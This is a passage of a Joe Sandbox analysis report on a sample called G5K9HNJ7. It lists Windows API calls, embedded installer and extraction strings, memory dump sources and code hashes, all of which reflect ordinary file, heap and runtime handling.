                                                              • SetEndOfFile.KERNEL32(?,00000000,?,?,?,40000000,00000005,00000002,08000080,?,00000000,?,?,00000000,000000FF), ref: 0021AEED
                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0021AF04
                                                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0021AF7C
                                                              • CloseHandle.KERNEL32(?,00000000,?,?,?,40000000,00000005,00000002,08000080,?,00000000,?,?,00000000,000000FF), ref: 0021B02C
                                                              • GetLastError.KERNEL32 ref: 0021B057
                                                                • Part of subcall function 00219B6A: SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00219B82
                                                                • Part of subcall function 00219B6A: GetLastError.KERNEL32(?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 00219B8C
                                                              Strings
                                                              • Extracting file: %ws, xrefs: 0021AE06
                                                              • User canceled extraction..., xrefs: 0021B019
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorLast$Pointer$CloseHandleLocalReadTimeswprintf
                                                              • String ID: Extracting file: %ws$User canceled extraction...
                                                              • API String ID: 1889754113-1866894759
                                                              • Opcode ID: 80e03d7941ffbaadc203a1ccbd992afa8623ec64eb9e6b2c9c79c0d376ecde45
                                                              • Instruction ID: e9e8004e4d0d558368e539bb2877f4722acd6e26d27d0d21e84f7ba3c94928ae
                                                              • Opcode Fuzzy Hash: 80e03d7941ffbaadc203a1ccbd992afa8623ec64eb9e6b2c9c79c0d376ecde45
                                                              • Instruction Fuzzy Hash: 4F617170A202199FCB329F64DCC9FEEB6F5AB6C700F104594F29996151D6B2DAE09F20
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,6D824150,00000024,?,00000000,00000000), ref: 00218930
                                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,0021A366,?,?,?), ref: 00218957
                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0021A366,?,?,?,00000000,000000FF), ref: 0021895E
                                                                • Part of subcall function 00219A43: GetProcessHeap.KERNEL32(00000000,?,?,00218CCC,?,?,00000000), ref: 00219A4D
                                                                • Part of subcall function 00219A43: HeapSize.KERNEL32(00000000,?,00218CCC,?,?,00000000), ref: 00219A54
                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,0021A366,?,?,?,00000000), ref: 00218968
                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0021A366,?,?,?,00000000,000000FF), ref: 0021896F
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 00218992
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0021A366,?,?,?,00000000,000000FF), ref: 00218998
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocByteCharMultiWide$ErrorLastSize
                                                              • String ID: W
                                                              • API String ID: 3423999398-655174618
                                                              • Opcode ID: 2a78cd17759c6bc54063a571b3f199275d7823eadb8089079f460719521a3c5e
                                                              • Instruction ID: 53ee8ddc967f31ad08ca16db883d8326a3b4bfc920804a1f3d13df8dca911c18
                                                              • Opcode Fuzzy Hash: 2a78cd17759c6bc54063a571b3f199275d7823eadb8089079f460719521a3c5e
                                                              • Instruction Fuzzy Hash: 522193B1810109FFCB109FA49CC49FDBBF8EF25354F308669E251E7290CA358E909B11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,00217F2D,?,0100002D,?,00000000,00000000,00000000), ref: 002182AB
                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00217F2D,?,0100002D,?,00000000,00000000,00000000,?,?,?,?,00217DDD), ref: 002182B2
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00217F2D,?,0100002D,?,00000000,00000000,00000000), ref: 0021831C
                                                              • HeapFree.KERNEL32(00000000,?,?,?,00217F2D,?,0100002D,?,00000000,00000000,00000000,?,?,?,?,00217DDD), ref: 00218323
                                                              Strings
                                                              • Failed to retrieve the the cluster resource property value, xrefs: 00218300
                                                              • Failed to allocate memory for the cluster resource property buffer, xrefs: 002182C3
                                                              • Failed to retrieve the size from the cluster resource property buffer, xrefs: 00218293
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: Failed to allocate memory for the cluster resource property buffer$Failed to retrieve the size from the cluster resource property buffer$Failed to retrieve the the cluster resource property value
                                                              • API String ID: 756756679-2748719997
                                                              • Opcode ID: cec8b6a9a072f128e9a3504a694f16f79e057fb5f88766d2f0a2428844f2f13e
                                                              • Instruction ID: 45b4fc76f65322ad8ddc5d2622accb9c7ec41d0ecb6b2ca620f301b42c34f84a
                                                              • Opcode Fuzzy Hash: cec8b6a9a072f128e9a3504a694f16f79e057fb5f88766d2f0a2428844f2f13e
                                                              • Instruction Fuzzy Hash: 8B219F72921115BFDB125FA1ED8DDEF7FE8EF65B60B204065F908D2140DE348AE09AA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _malloc.LIBCMT ref: 00231698
                                                                • Part of subcall function 0022CDB5: __FF_MSGBANNER.LIBCMT ref: 0022CDCE
                                                                • Part of subcall function 0022CDB5: __NMSG_WRITE.LIBCMT ref: 0022CDD5
                                                                • Part of subcall function 0022CDB5: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0022DBEB,?,00000001,?,?,0022D143,00000018,00236FA0,0000000C,0022D1D8), ref: 0022CDFA
                                                              • _free.LIBCMT ref: 002316AB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free_malloc
                                                              • String ID: ;n#
                                                              • API String ID: 1020059152-2389107768
                                                              • Opcode ID: beebed438a1e743bd570a2172a232a34c60ebee863eddc0d3a4e8fce9daf58cb
                                                              • Instruction ID: e2b843c76445f6868fb9b28d6fdcb70ec391c7322c1d935ef6eba4073346c0f6
                                                              • Opcode Fuzzy Hash: beebed438a1e743bd570a2172a232a34c60ebee863eddc0d3a4e8fce9daf58cb
                                                              • Instruction Fuzzy Hash: 6A11EB72831221BACB322FF4BC0A79A3758AF443A1F298526F9589B150DF30C8709F94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00236E90,00000008,0022A729,00000000,00000000,?,0022DBEB,?,00000001,?,?,0022D143,00000018,00236FA0,0000000C), ref: 0022A62D
                                                              • __lock.LIBCMT ref: 0022A661
                                                                • Part of subcall function 0022D1BD: __mtinitlocknum.LIBCMT ref: 0022D1D3
                                                                • Part of subcall function 0022D1BD: __amsg_exit.LIBCMT ref: 0022D1DF
                                                                • Part of subcall function 0022D1BD: EnterCriticalSection.KERNEL32(?,?,?,0022A803,0000000D,00236EB8,00000008,002337A4,?,00000000), ref: 0022D1E7
                                                              • InterlockedIncrement.KERNEL32(0023A448), ref: 0022A66E
                                                              • __lock.LIBCMT ref: 0022A682
                                                              • ___addlocaleref.LIBCMT ref: 0022A6A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                              • String ID: KERNEL32.DLL
                                                              • API String ID: 637971194-2576044830
                                                              • Opcode ID: 9f2e3cc728632545f77aa028abec29aedc3ebddc257bd3ee61544eb82824a2d9
                                                              • Instruction ID: f881ac98ced236f24e99c070ba5d3e9709a85f0d3b3dff32b948077c2b24650c
                                                              • Opcode Fuzzy Hash: 9f2e3cc728632545f77aa028abec29aedc3ebddc257bd3ee61544eb82824a2d9
                                                              • Instruction Fuzzy Hash: 7A018471451710FFD720EFA5E80A749FBE1BF10314F10890DE5AA56BA0CBB4A664CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __getptd.LIBCMT ref: 00234FE2
                                                                • Part of subcall function 0022A753: __getptd_noexit.LIBCMT ref: 0022A756
                                                                • Part of subcall function 0022A753: __amsg_exit.LIBCMT ref: 0022A763
                                                              • __getptd.LIBCMT ref: 00234FF3
                                                              • __getptd.LIBCMT ref: 00235001
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                              • String ID: MOC$RCC$csm
                                                              • API String ID: 803148776-2671469338
                                                              • Opcode ID: 8c2ebab0d2ed4d0fea42efe5ed5d7f483909f0bfe9a5f0ac829d02d42dc837ac
                                                              • Instruction ID: 244c17d2c3bef397f002b1c9d4bf78bfbcfabb9da651ca3056efa24d00f67225
                                                              • Opcode Fuzzy Hash: 8c2ebab0d2ed4d0fea42efe5ed5d7f483909f0bfe9a5f0ac829d02d42dc837ac
                                                              • Instruction Fuzzy Hash: 1EE01A711342149FC724AFA8D04AB6C73A4FF88314F6945E2E80CCB622C738E8708987
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __CreateFrameInfo.LIBCMT ref: 002352BE
                                                                • Part of subcall function 00234CDB: __getptd.LIBCMT ref: 00234CE9
                                                                • Part of subcall function 00234CDB: __getptd.LIBCMT ref: 00234CF7
                                                              • __getptd.LIBCMT ref: 002352C8
                                                                • Part of subcall function 0022A753: __getptd_noexit.LIBCMT ref: 0022A756
                                                                • Part of subcall function 0022A753: __amsg_exit.LIBCMT ref: 0022A763
                                                              • __getptd.LIBCMT ref: 002352D6
                                                              • __getptd.LIBCMT ref: 002352E4
                                                              • __getptd.LIBCMT ref: 002352EF
                                                              • _CallCatchBlock2.LIBCMT ref: 00235315
                                                                • Part of subcall function 00234D8F: __CallSettingFrame@12.LIBCMT ref: 00234DDB
                                                                • Part of subcall function 002353BC: __getptd.LIBCMT ref: 002353CB
                                                                • Part of subcall function 002353BC: __getptd.LIBCMT ref: 002353D9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 1602911419-0
                                                              • Opcode ID: 073948e22dcac3c2d606d858e0d2ed7a2f8fa1c5d39efb8e93416188e5313c72
                                                              • Instruction ID: 2e4fa9a9d7440dc91030dc98032e42d61e8de5753ec98aa6ab10b559c6407cdf
                                                              • Opcode Fuzzy Hash: 073948e22dcac3c2d606d858e0d2ed7a2f8fa1c5d39efb8e93416188e5313c72
                                                              • Instruction Fuzzy Hash: 711107B5C10219EFDB00EFA4D446BADBBB0FF04314F1084A9F818AB251DB789A21DF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __getptd.LIBCMT ref: 0022C595
                                                                • Part of subcall function 0022A753: __getptd_noexit.LIBCMT ref: 0022A756
                                                                • Part of subcall function 0022A753: __amsg_exit.LIBCMT ref: 0022A763
                                                              • __amsg_exit.LIBCMT ref: 0022C5B5
                                                              • __lock.LIBCMT ref: 0022C5C5
                                                              • InterlockedDecrement.KERNEL32(?), ref: 0022C5E2
                                                              • _free.LIBCMT ref: 0022C5F5
                                                              • InterlockedIncrement.KERNEL32(02B61660), ref: 0022C60D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                              • String ID:
                                                              • API String ID: 3470314060-0
                                                              • Opcode ID: d4eeec6b69ff52dbcdfe12e35c9aed432afabc12df2a2a5a5943e07a2da49522
                                                              • Instruction ID: b1d5a33cd3f93a108112a729b205c1bf50a5dcd2b800d914b832b5116d823d44
                                                              • Opcode Fuzzy Hash: d4eeec6b69ff52dbcdfe12e35c9aed432afabc12df2a2a5a5943e07a2da49522
                                                              • Instruction Fuzzy Hash: 8501AD72920A32FBCB20AFA4B40A7ADB7A0BF00710F644115E84477690CB74E972CFD6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00219CA3: CreateFileW.KERNELBASE(?,?,0023BEF0,00000000,00215AE3,?,00000000,?,00000000,?,?,?,0021843A,?,40000000,00000005), ref: 00219CD2
                                                              • GetLastError.KERNEL32(00000000,80000000,00000007,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,?,?,0021A8F1), ref: 0021A9EE
                                                              • ReadFile.KERNEL32(00000000,?,00000024,?,00000000,00000000,80000000,00000007,00000003,00000080,00000000,00000000,00000000), ref: 0021AA2C
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,0021A8F1,?,00000000,00000004,?,00000000,?), ref: 0021AA36
                                                              • CloseHandle.KERNEL32(00000000), ref: 0021AAED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLast$CloseCreateHandleRead
                                                              • String ID: $
                                                              • API String ID: 3160720760-3993045852
                                                              • Opcode ID: 40c6027e6a48c8f1407628fe160695de12663544a4d872df8a801e1b2fe87188
                                                              • Instruction ID: 24ea5430181636302473b8356a5c609817fc05611e74d17a8581d082c3e721c4
                                                              • Opcode Fuzzy Hash: 40c6027e6a48c8f1407628fe160695de12663544a4d872df8a801e1b2fe87188
                                                              • Instruction Fuzzy Hash: C0419271D2120A9FCB21CF79DA44AED77F4EF68320F248619E421E6180D77489E0CF66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___BuildCatchObject.LIBCMT ref: 00235665
                                                                • Part of subcall function 002355BB: ___BuildCatchObjectHelper.LIBCMT ref: 002355F1
                                                              • _UnwindNestedFrames.LIBCMT ref: 0023567C
                                                              • ___FrameUnwindToState.LIBCMT ref: 0023568A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                              • String ID: csm$csm
                                                              • API String ID: 2163707966-3733052814
                                                              • Opcode ID: e371cabbb856675a566eb448d13e963a276105ceaaefeb0375b179d063171748
                                                              • Instruction ID: 83bc8e902a80cb8bb62d5409be72961fb34fdfe548d38ef1e60297acfea0ee47
                                                              • Opcode Fuzzy Hash: e371cabbb856675a566eb448d13e963a276105ceaaefeb0375b179d063171748
                                                              • Instruction Fuzzy Hash: 3901F6B501191ABBDF126F51CC46EEB7F6AEF08350F444010BD1C25161DB72A9B1EFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __getptd.LIBCMT ref: 0022CD43
                                                                • Part of subcall function 0022A753: __getptd_noexit.LIBCMT ref: 0022A756
                                                                • Part of subcall function 0022A753: __amsg_exit.LIBCMT ref: 0022A763
                                                              • __getptd.LIBCMT ref: 0022CD5A
                                                              • __amsg_exit.LIBCMT ref: 0022CD68
                                                              • __lock.LIBCMT ref: 0022CD78
                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0022CD8C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                              • String ID:
                                                              • API String ID: 938513278-0
                                                              • Opcode ID: a77e63b9e1ebb12ade9769ff07922b0421e54d99e9946b57032edbd5918af882
                                                              • Instruction ID: 7e6b8d2992b956748efddcfbaa466cad9bc68cfff8ad257211ec74efa0ccbe64
                                                              • Opcode Fuzzy Hash: a77e63b9e1ebb12ade9769ff07922b0421e54d99e9946b57032edbd5918af882
                                                              • Instruction Fuzzy Hash: 21F0F032924730BBD720BBE8B807B5C77A06F01720F208169F405A69D2CB644821CE4A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00229A87: _doexit.LIBCMT ref: 00229A93
                                                              • ___set_flsgetvalue.LIBCMT ref: 0023374B
                                                                • Part of subcall function 0022A57F: TlsGetValue.KERNEL32(?,00233750), ref: 0022A588
                                                                • Part of subcall function 0022A57F: _DecodePointerInternal@4.G5K9HNJ7(?,00233750), ref: 0022A59A
                                                                • Part of subcall function 0022A57F: TlsSetValue.KERNEL32(00000000,?,00233750), ref: 0022A5A9
                                                              • ___fls_getvalue@4.LIBCMT ref: 00233756
                                                                • Part of subcall function 0022A555: TlsGetValue.KERNEL32(?,?,0023375B,00000000), ref: 0022A563
                                                              • ___fls_setvalue@8.LIBCMT ref: 00233769
                                                                • Part of subcall function 0022A5B8: _DecodePointerInternal@4.G5K9HNJ7(?,?,?,0023376E,00000000,?,00000000), ref: 0022A5C9
                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00233772
                                                              • ExitThread.KERNEL32 ref: 00233779
                                                              • GetCurrentThreadId.KERNEL32 ref: 0023377F
                                                              • __freefls@4.LIBCMT ref: 0023379F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Value$DecodeInternal@4PointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                              • String ID:
                                                              • API String ID: 1443443662-0
                                                              • Opcode ID: d50404a0dbacf69b205feadb9278bc6c10195d410db3037aca6294f9893bb4a0
                                                              • Instruction ID: e2581b2a29b933832bcfb121d376e5815719219f3780d35df2dcbca0ff6525ea
                                                              • Opcode Fuzzy Hash: d50404a0dbacf69b205feadb9278bc6c10195d410db3037aca6294f9893bb4a0
                                                              • Instruction Fuzzy Hash: D0E0BFE5C202667B8F117BF1BD0A8DF7A2C9F55355F514410BE10A7411DE389A714AA3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00219166: LoadStringW.USER32(?,?,00000000,00000040), ref: 00219189
                                                              • MessageBoxW.USER32(00000000,?,?,00000010), ref: 00215DC5
                                                              Strings
                                                              • Failed to concatenate message with error string., xrefs: 00215D6B
                                                              • Failed to get error message for error: 0x%x., xrefs: 00215D91
                                                              • Failed to get error string from error: 0x%x, xrefs: 00215D48
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: LoadMessageString
                                                              • String ID: Failed to concatenate message with error string.$Failed to get error message for error: 0x%x.$Failed to get error string from error: 0x%x
                                                              • API String ID: 2284331267-3986587811
                                                              • Opcode ID: 2e0b96f4f7069d7c45d71c962c7e2a3feae4f5add21fd834309873cd465556a8
                                                              • Instruction ID: 8a70c30ba6d92a4c4a3e7be91e1d2be6e84d6705dc4411a5812fc9cc6661e2af
                                                              • Opcode Fuzzy Hash: 2e0b96f4f7069d7c45d71c962c7e2a3feae4f5add21fd834309873cd465556a8
                                                              • Instruction Fuzzy Hash: 8B317431D70A19FACF11ABA4AC4AADDB6F59BB0714F3045A6F40171061D7754AF0AB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0021E3D2
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,0000005F,00000000,00000010,0021E493,00000000,?,00000000,00000000), ref: 0021E43B
                                                              • __CxxThrowException@8.LIBCMT ref: 0021E460
                                                                • Part of subcall function 0021C523: __CxxThrowException@8.LIBCMT ref: 0021C58A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw$ByteCharH_prolog3MultiWide
                                                              • String ID: _
                                                              • API String ID: 3478574853-701932520
                                                              • Opcode ID: 5c7efceb114b8449956230a5825a62a7a739bd240452e6dc14b48c27d4684ac5
                                                              • Instruction ID: ffa9c9bef34aa03ade49a6f3258adbe0654b958c1af5e87315ad24742cd7f816
                                                              • Opcode Fuzzy Hash: 5c7efceb114b8449956230a5825a62a7a739bd240452e6dc14b48c27d4684ac5
                                                              • Instruction Fuzzy Hash: BA211DB5910246EFCB10DF58C8819AEBBF5FF58700F51886DE559A7201C370AA95CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,00219DA9,?,?,002160C2,?,?,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A41C
                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,00219DA9,?,?,002160C2,?,?,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A43A
                                                              • HeapFree.KERNEL32(00000000,?,?,002160C2,?,?,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A43D
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00219DA9,?,?,002160C2,?,?,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A458
                                                              • HeapFree.KERNEL32(00000000,?,?,002160C2,?,?,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A45B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$FreeProcess$CloseHandle
                                                              • String ID:
                                                              • API String ID: 1236364404-0
                                                              • Opcode ID: 8a4126bd41ed080a17d0f6190365d979862204ac31dfcbaeabd411dcc8b8f8bb
                                                              • Instruction ID: 8814e89955808d54607ce7b66316c3a30a4d979863dc30779aad3d4e28d22497
